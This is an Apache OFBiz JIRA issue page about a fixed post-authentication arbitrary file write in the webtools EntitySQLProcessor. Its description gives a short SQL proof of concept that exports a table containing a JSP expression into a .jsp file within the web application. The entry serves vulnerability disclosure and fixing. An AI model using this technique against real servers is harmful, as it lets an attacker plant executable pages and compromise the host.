[OFBIZ-12057] Prevent arbitary file write using webtools/control/EntitySQLProcessor. - ASF JIRA

XML

Word

Printable

JSON

Details

Type: Sub-task
Status: Closed
Priority: Major
Resolution: Fixed
Affects Version/s: Trunk
Fix Version/s: 17.12.05, 18.12.01
Component/s: framework/webtools
Labels:
None

Sprint:
Bug Crush Event - 21/2/2015

Description

Shuibo Ye <shuiboye@gmail.com> reported a possible arbitary file write using webtools/control/EntitySQLProcessor.

In the "SQL Command" part, I create a table and insert some strings and export the table to a file one sentence at a time.
PoC: CREATE TABLE "test" (string VARCHAR(80))
INSERT INTO "test" (string) VALUES ('<%= system.getProperty("user.dir") %>')
call SYSCS_UTIL.SYSCS_EXPORT_TABLE(null,'test','.\framework\webtools\webapp\webtools\default.jsp',null,'*',null)

After executing the three sentences,I successfully write the file and its url is https://localhost:8443/webtools/default.jsp.

Note: this is a post-auth vuln., So we did not create a CVE

Attachments

Activity

People

Assignee:: Jacques Le Roux

Reporter:: Jacques Le Roux

Votes:: 0 Vote for this issue

Watchers:: 2 Start watching this issue

Dates

Created:: 16/Nov/20 13:05

Updated:: 16/Nov/20 13:14

Resolved:: 16/Nov/20 13:14